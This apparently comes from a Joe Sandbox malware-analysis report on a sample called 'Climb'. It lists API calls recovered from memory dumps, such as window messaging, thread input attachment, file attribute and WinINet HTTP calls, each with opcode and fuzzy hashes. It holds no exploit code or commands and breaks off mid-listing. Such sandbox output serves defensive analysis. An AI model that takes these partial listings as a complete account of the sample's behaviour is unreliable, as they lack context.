                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                          • Opcode ID: 2fba00aad7772c0de59c46df1647e98b93e1ab6aeb3cfaf3252e26fac08ac21c
                                                                                                                                                                          • Instruction ID: 8ed7e111c1a850abafb3075d91a56af20d83013e8a7a0c9ef74ec1f166203580
                                                                                                                                                                          • Opcode Fuzzy Hash: 2fba00aad7772c0de59c46df1647e98b93e1ab6aeb3cfaf3252e26fac08ac21c
                                                                                                                                                                          • Instruction Fuzzy Hash: 89219D75A00118BBDF11EBA0DC85FFEBBB9EF09300F00405AB961A72A1DB758849DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AF4539
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AF453C
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00AF4563
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF4586
                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AF45FE
                                                                                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00AF4648
                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00AF4663
                                                                                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00AF467E
                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00AF4692
                                                                                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00AF46AF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 312131281-0
                                                                                                                                                                          • Opcode ID: a7ac44521eff2c5fea2ccf5014269c7947e9d3119ad576ee1833a627d98697be
                                                                                                                                                                          • Instruction ID: 0f22c68c9d1167c2f4cd37f0648ab6e68759eb7e0529071d132a2e5756151f37
                                                                                                                                                                          • Opcode Fuzzy Hash: a7ac44521eff2c5fea2ccf5014269c7947e9d3119ad576ee1833a627d98697be
                                                                                                                                                                          • Instruction Fuzzy Hash: 86615975A00208AFDB21DFA8CD81EFE77B8EF09714F204169FA14E72A1D774A946DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00ACBB18
                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBB2C
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00ACBB33
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBB42
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACBB54
                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBB6D
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBB7F
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBBC4
                                                                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBBD9
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00ACABA8,?,00000001), ref: 00ACBBE4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2156557900-0
                                                                                                                                                                          • Opcode ID: 9af037b4fb3e9421bc51a48599b44a9d855dfef02ba89054c08a4f579f4e5bad
                                                                                                                                                                          • Instruction ID: bb6a8a71ad63ca8e35a05793c4b6bdf9dcebdb3821a726388c8745843f2c95f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 9af037b4fb3e9421bc51a48599b44a9d855dfef02ba89054c08a4f579f4e5bad
                                                                                                                                                                          • Instruction Fuzzy Hash: D331A271A24304AFDB16DBA4DD86F7D77AAEB54312F224009FA05DB1A4DB75AC40CB30
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00A93007
                                                                                                                                                                            • Part of subcall function 00A92D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4), ref: 00A92D4E
                                                                                                                                                                            • Part of subcall function 00A92D38: GetLastError.KERNEL32(00B31DC4,?,00A9DB51,00B31DC4,00000000,00B31DC4,00000000,?,00A9DB78,00B31DC4,00000007,00B31DC4,?,00A9DF75,00B31DC4,00B31DC4), ref: 00A92D60
                                                                                                                                                                          • _free.LIBCMT ref: 00A93013
                                                                                                                                                                          • _free.LIBCMT ref: 00A9301E
                                                                                                                                                                          • _free.LIBCMT ref: 00A93029
                                                                                                                                                                          • _free.LIBCMT ref: 00A93034
                                                                                                                                                                          • _free.LIBCMT ref: 00A9303F
                                                                                                                                                                          • _free.LIBCMT ref: 00A9304A
                                                                                                                                                                          • _free.LIBCMT ref: 00A93055
                                                                                                                                                                          • _free.LIBCMT ref: 00A93060
                                                                                                                                                                          • _free.LIBCMT ref: 00A9306E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: d99eba6a603b67f2e6d64b67736dd7e4fea3c17503c502955d7b51757fc2486c
                                                                                                                                                                          • Instruction ID: ef526b7fbb4f583bc0821fcac30dfb8c714caf9e336fd594f0031d989671a980
                                                                                                                                                                          • Opcode Fuzzy Hash: d99eba6a603b67f2e6d64b67736dd7e4fea3c17503c502955d7b51757fc2486c
                                                                                                                                                                          • Instruction Fuzzy Hash: BC118676600108BFCF11EF94CA82EDD3BB5EF05354B9145A5FA089F222DA32EF519B90
                                                                                                                                                                          APIs
                                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A62AF9
                                                                                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00A62B98
                                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 00A62D7D
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00AA3A1B
                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00AA3A80
                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AA3AAD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                          • String ID: close all
                                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                                          • Opcode ID: 75e2b0ce1d9ea68d0dfc3ebf164eda10dd16eaa3396ab5bb4faa9d11d67005e6
                                                                                                                                                                          • Instruction ID: 941e977d2d3c1433baf9eaed92490b2d69757009e3e6c57676d697a3d2c541f5
                                                                                                                                                                          • Opcode Fuzzy Hash: 75e2b0ce1d9ea68d0dfc3ebf164eda10dd16eaa3396ab5bb4faa9d11d67005e6
                                                                                                                                                                          • Instruction Fuzzy Hash: 39D15A32701622DFCB29EF54C989B69F7B1EF05750F1142ADE54AAB2A1CB31AD12CF50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AD89F2
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8A06
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00AD8A30
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00AD8A4A
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8A5C
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8AA5
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AD8AF5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 769691225-438819550
                                                                                                                                                                          • Opcode ID: 06991066873a9f8d6504842bef3da7f0ec2c04aeeb5474f31547c225c4a572e9
                                                                                                                                                                          • Instruction ID: c24ad18286989ee1a6c441bf4688915797554dd8a08ec5b7abdccfeddc2517eb
                                                                                                                                                                          • Opcode Fuzzy Hash: 06991066873a9f8d6504842bef3da7f0ec2c04aeeb5474f31547c225c4a572e9
                                                                                                                                                                          • Instruction Fuzzy Hash: BC817C729042059BCB24EF54C954ABEB3E8BF84350F58481BF8C6D7350EB39E945DB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00A674D7
                                                                                                                                                                            • Part of subcall function 00A67567: GetClientRect.USER32(?,?), ref: 00A6758D
                                                                                                                                                                            • Part of subcall function 00A67567: GetWindowRect.USER32(?,?), ref: 00A675CE
                                                                                                                                                                            • Part of subcall function 00A67567: ScreenToClient.USER32(?,?), ref: 00A675F6
                                                                                                                                                                          • GetDC.USER32 ref: 00AA6083
                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00AA6096
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00AA60A4
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00AA60B9
                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00AA60C1
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00AA6152
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                          • String ID: U
                                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                                          • Opcode ID: 0065242b67d48d2a8ec670a4a064e3bde4be2c82279179f793fcab091c8c952f
                                                                                                                                                                          • Instruction ID: 7d546879fec1b30daadd1a89501a1f4e3d316df288fc27dd20a3c033d2c571f4
                                                                                                                                                                          • Opcode Fuzzy Hash: 0065242b67d48d2a8ec670a4a064e3bde4be2c82279179f793fcab091c8c952f
                                                                                                                                                                          • Instruction Fuzzy Hash: F6719F31500205DFCF25DFA4C888ABE7FB5FF4A315F288269E9555B1A6DB318881DF50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A6249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A624B0
                                                                                                                                                                            • Part of subcall function 00A619CD: GetCursorPos.USER32(?), ref: 00A619E1
                                                                                                                                                                            • Part of subcall function 00A619CD: ScreenToClient.USER32(00000000,?), ref: 00A619FE
                                                                                                                                                                            • Part of subcall function 00A619CD: GetAsyncKeyState.USER32(00000001), ref: 00A61A23
                                                                                                                                                                            • Part of subcall function 00A619CD: GetAsyncKeyState.USER32(00000002), ref: 00A61A3D
                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00AF95C7
                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00AF95CD
                                                                                                                                                                          • ReleaseCapture.USER32 ref: 00AF95D3
                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00AF966E
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AF9681
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00AF975B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                          • API String ID: 1924731296-2107944366
                                                                                                                                                                          • Opcode ID: bcde56a27a74a54aab56d26a10410e6940a066567921ecab38e73b1afb306f8f
                                                                                                                                                                          • Instruction ID: 197cf5e554b5b05013b67317acd0c38e708c12e60f6768a0d7a59d81c428a76f
                                                                                                                                                                          • Opcode Fuzzy Hash: bcde56a27a74a54aab56d26a10410e6940a066567921ecab38e73b1afb306f8f
                                                                                                                                                                          • Instruction Fuzzy Hash: E151AC71504304AFD704EF64CD56FBA77E5FB88710F100A28FA969B2E2DB709909CB52
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00ADCCB7
                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00ADCCDF
                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00ADCD0F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00ADCD67
                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 00ADCD7B
                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00ADCD86
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3113390036-3916222277
                                                                                                                                                                          • Opcode ID: d88560b7de1061e8794f358f471cc726ee51f3b44534867dd0ad7caf5ca287fc
                                                                                                                                                                          • Instruction ID: e91c2e8be81048e73fbc17fbfe28caecff60204764c9df0f7299b180429db876
                                                                                                                                                                          • Opcode Fuzzy Hash: d88560b7de1061e8794f358f471cc726ee51f3b44534867dd0ad7caf5ca287fc
                                                                                                                                                                          • Instruction Fuzzy Hash: FE318F71500209AFD721EFA48D84ABB7BFEEF45750B50452AF48696310DB34E905DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AA55AE,?,?,Bad directive syntax error,00AFDCD0,00000000,00000010,?,?), ref: 00ACA236
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,00AA55AE,?), ref: 00ACA23D
                                                                                                                                                                            • Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333
                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00ACA301
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                          • API String ID: 858772685-4153970271
                                                                                                                                                                          • Opcode ID: dc7983e2387c66f8d028247f72c5093755580de43d02c89d1117f4ff7046a075
                                                                                                                                                                          • Instruction ID: f0d74bf8dd5acaa903fcf44f2d0022ecf962bcf5f5f0f3e95f0806e7dd608f51
                                                                                                                                                                          • Opcode Fuzzy Hash: dc7983e2387c66f8d028247f72c5093755580de43d02c89d1117f4ff7046a075
                                                                                                                                                                          • Instruction Fuzzy Hash: 61216F3195021EEFCF02EFA0CC16EFE7B79BF18304F004459B519A51A2EB719658DB11
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetParent.USER32 ref: 00AC29F8
                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00AC2A0D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00AC2A9A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassMessageNameParentSend
                                                                                                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                          • API String ID: 1290815626-3381328864
                                                                                                                                                                          • Opcode ID: c1fe45033ae8e43314eea0c367fdc2378b800dde1e84cae82edfde9f318d327a
                                                                                                                                                                          • Instruction ID: b1b29aea8d5152ccbcd236a2dc8ff3066583a6dbc58bdfdc574958ee2363ccf9
                                                                                                                                                                          • Opcode Fuzzy Hash: c1fe45033ae8e43314eea0c367fdc2378b800dde1e84cae82edfde9f318d327a
                                                                                                                                                                          • Instruction Fuzzy Hash: EF110676684307F9FA257320EC0BFA63BEC8F19764B21401AF904F50E1FBA1A8014714
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00A6758D
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00A675CE
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00A675F6
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00A6773A
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00A6775B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1296646539-0
                                                                                                                                                                          • Opcode ID: 880c0488a0e5f53789c1891b019739b51e2197dfff986bf8d5c04a91ee0c2a1c
                                                                                                                                                                          • Instruction ID: 60b12b3dab7756277227bf0d94c0298b6e4f62d765d13b673df4d025c4cca1c8
                                                                                                                                                                          • Opcode Fuzzy Hash: 880c0488a0e5f53789c1891b019739b51e2197dfff986bf8d5c04a91ee0c2a1c
                                                                                                                                                                          • Instruction Fuzzy Hash: 09C1577991464AEFDB10CFA8C980BEDBBB1FF08314F14841AE8A5E7250DB34A951DF60
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
